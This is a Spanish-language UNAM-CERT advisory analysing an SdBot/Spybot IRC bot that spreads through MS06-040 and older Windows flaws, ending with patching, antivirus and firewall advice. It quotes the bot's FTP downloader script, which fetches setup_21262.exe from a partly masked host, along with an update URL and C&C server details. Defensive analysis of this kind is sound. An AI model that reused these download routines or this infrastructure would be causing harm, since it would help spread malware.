UNAM-CERT

1. Sistemas afectados

   Los sistemas operativos que han presentado infección por parte del bot son los siguientes:

   • Windows NT 4.0
   • Windows 2000 Servive Pack 4
   • Windows XP Professional

   El 90% de los equipos reportados con este patrón de comportamiento a UNAM-CERT han sido Windows 2000 debido a que no presentan algún tipo de protección como un firewall personal, a diferencia de los sistemas XP que al tener instalado el Service Pack 2 habilitan de forma predeterminada el firewall de Windows.

   Se ha detectado que el bot toma ventaja de la vulnerabilidad en el Servicio de Servidor de Windows que soluciona el Boletín de Seguridad de Microsoft MS06-040 por lo que no se descarta que también los siguientes sistemas puedan estar en riesgo de ser infectados si no tienen esta actualización instalada:

   • Microsoft Windows XP Service Pack 2
   • Microsoft Windows XP Professional x64 Edition
   • Microsoft Windows Server 2003 y Microsoft Windows Server 2003 Service Pack 1
   • Microsoft Windows Server 2003 para sistemas con Itanium y Microsoft Windows Server 2003 con SP1 para sistemas con Itanium

2. Descripción

   El Proyecto Honeynet del UNAM-CERT en los últimos días ha detectado un incremento en la actividad de malware por parte de direcciones IP localizadas en la red universitaria.

   El monitoreo de algunas porciones de la red permitió identificar un incremento en la actividad hacia el puerto 139/tcp, el cual es un puerto utilizado por el servicio de NetBios en sistemas operativos Windows.

   En días pasados se realizó la captura de una nueva muestra de malware que se empieza a propagar rápidamente, infectando a varios equipos Windows en poco tiempo.

   El análisis de la muestra de malware realizado tanto por el equipo de Malware y Honeynet del UNAM-CERT dictaminó que se trata de un bot que permite el control remoto de equipos vulnerados para los fines que el intruso decida.

   
   

   Análisis del bot

   Éste código malicioso ya es detectado por distintas firmas antivirus como se puede ver a continuación:

   Antivirus	Nombre
   AntiVir	Worm/Sdbot.65963.1
   Authentium	W32/Sdbot.UJO
   AVG	IRC/BackDoor.SdBot2.HNO
   DrWeb	BackDoor.IRC.Sdbot.792
   Ewido	Backdoor.SdBot.atz
   Kaspersky	Backdoor.Win32.SdBot.atz
   NOD32v2	Variante de IRC/SdBot
   Symantec	W32.Spybot.Worm
   UNA	Backdoor.SdBot.2
   VBA32	Backdoor.Win32.SdBot.atz

   Algunos nombres de los procesos con los que el bot se ejecuta en los sistemas son:

   • smss.exe
   • register.exe
   
   

   Los archivos ejecutables de estos procesos maliciosos usualmente están alojados en el directorio C:\Winnt (Windows NT y Windows 2000) y C:\Windows (Windows XP y Windows Sever 2003).

   Es importante señalar que el código malicioso se instala en el sistema como un servicio propio de Windows para que se inicie junto con el sistema operativo. Por ejemplo, para el caso del ejecutable smss.exe se instalará un servicio con el nombre de Windows NT Session Managers y para el ejecutable register.exe se instalará un servicio con el nombre Windows Register Control. Estos servicios pueden ser visualizados a través de la consola Servicios de Windows. Cabe señalar que el nombre de los servicios puede variar dependiendo de la variante del bot.

   El análisis también reveló que existe un archivo con nombre i (sin extensión) en el directorio C:\Winnt\system32 que contiene una rutina para descargar el ejecutable del bot como se muestra a continuación:

   open 132.248.X.X 25869
   user 1 1
   get setup_21262.exe
   quit
   

   
   

   Rutina de ejecución del bot

   El bot se conecta a un servidor IRC con el nombre de dominio mail2.tiktikz.com que resuelve al siguiente sitio:

   AS	|	IP	|	CC	|	AS Name
   9844	|	61.97.152.3	|	KR	|	HANINTERNET-AS HaninterNetworks

   De acuedo a diversos analisis del equipo UNAM-CERT el bot se conecta por el puerto 9632 y es importante denotar que se conecta a un canal llamado #edu, al parecer es un canal dedicado para equipos localizados en instituciones académicas, el bot se actualiza descargando un malware del sitio http://140.127.X.X/xsetup.exe, y se le ordena escanear el segmento /24 en el cual se encuentra el equipo utilizando los puertos 135/tcp NetBIOS, 139/tcp NetBIOS, 445/tcp NetBios y 1433/tcp MSQL Server.

3. Impacto

   Un equipo vulnerable puede sufrir una negación de servicio al consumir el bot todos los recursos del sistema y provocar un ataque de negación de servicio en la red al ejecutar su rutina de infección (escaneos) contra otros sistemas.

4. Solución

   • Actualizar el sistema operativo Windows

   El bot toma ventajas de la vulnerabilidad en el Servicio de Servidor de Windows que fue cubierta por el Boletín de Seguridad de Microsoft MS06-040 liberado en Agosto pasado además de otras vulnerabilidades anteriores entre las que se encuentran:

   • Vulnerabilidad en DCOM RPC (descrita en Boletín de Seguridad de MicrosoftMS03-026) utilizando el puerto 135 TCP.
   • Buffer overflow Remoto en el Servicio Autoridad de Seguridad Local de Microsoft Windows (descrito en Boletín de Seguridad de MicrosoftMS04-011).
   • Vulnerabilidades en Microsoft SQL Server 2000 o MSDE 2000 (descrita en Boletín de Seguridad de MicrosoftMS02-061) utilizando el puerto 1434 UDP.
   • Vulnerabilidad en WebDav (descrita en Boletín de Seguridad de MicrosoftMS03-007) utilizando el puerto 80 TCP.
   • Vulnerabilidad de Buffer Overflow en UPnP NOTIFY (descrita en Boletín de Seguridad de MicrosoftMS01-059).
   • Vulnerabilidad de Buffer Overrun en el Servicio de Estación de Trabajo (descrita en Boletín de Seguridad de MicrosoftMS03-049) utilizando el puerto 445 TCP.
   • Vulnerabilidad de Negación de Servicio en la Biblioteca SSL de Microsoft Windows (descrita en Boletín de Seguridad de MicrosoftMS04-011).
   • Vulnerabilidad de Buffer Overflow en el Plug and Play de Microsoft Windows (descrita en Boletín de Seguridad de MicrosoftMS05-039).

   Debido a lo anteriormente mencionado es recomendable instalar a la brevedad todas las actualizaciones de seguridad liberadas hasta hoy en día.

   Es indispensable que el equipo cuente con el último Service Pack liberado para el sistema operativo en cuestión y todos los hotfixes liberados después de éste Service Pack.

   • Instalar y administrar un software antivirus

   Es necesario instalar, actualizar y ejecutar algún tipo de software antivirus. Algunos de los software antivirus removerán o pondrán el cuarentena el proceso del bot.

   Se debe establecer el software antivirus de tal forma que se ejecute un escaneo completo del equipo de forma periódica.

   • Implementar un firewall personal

   En los sistemas Windows NT y Windows 2000 es indispensable instalar y configurar un firewall personal que les permita estar protegidos contra éste tipo de amenazas.

   En el mercado existe una gran variedad de distribuidores de firewalls personales. Algunos de los más importantes son los siguientes:

   •  ZoneAlarm - Zone Labs
     http://www.zonelabs.com
   • Norton Personal Firewall - Symantec Corp.
     http://www.symantec.com
   • Tiny Personal Firewall - Tiny Software Inc.
     http://www.tinysoftware.com
   • Panda Platinum Internet Security - Panda Software
     http://www.pandasoftware.com
   • F-Secure Internet Security - F-Secure
     http://www.f-secure.com
   • Personal Firewall Plus - McAfee
     http://www.mcafee.com
   • eTrust EZ Firewall - Computer Associates
     http://www.ca.com

5. Referencias

   • Proyecto Windows UNAM-CERT: windows at seguridad.unam.mx
   • Honeynet UNAM-CERT: Proceso smss.exe
   • UNAM-CERT: Vulnerabilidad en el Servicio de Servidor podría permitir la ejecución remota de código (921883)
   • Usuario Casero UNAM-CERT: Firewalls personales.
   • Usuario Casero UNAM-CERT: Software antivirus.
   • Usuario Casero UNAM-CERT: Definición de Bot
   • Symantec Corp: W32.Spybot.Worm
   • Microsoft Corp: Boletín de seguridad de Microsoft MS06-040

El Departamento de Seguridad en Cómputo/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:

• Juan Lopez Morales (jlopez at seguridad dot unam dot mx)
• Sergio Alavez Miguel (salavez at seguridad dot unam dot mx)
• Christian Calderon Hernádez (ccalderon at seguridad dot unam dot mx)
• Jesús Ramón Jiménez Rojas (jrojas at seguridad dot unam dot mx)
• Luis Fernando Fuentes Serrano (lfuentes at seguridad dot unam dot mx)
• Ruben Aquino Luna (raquino at seguridad dot unam dot mx)
• David Jiménez Domínguez (djimenez at correo dot seguridad dot unam dot mx)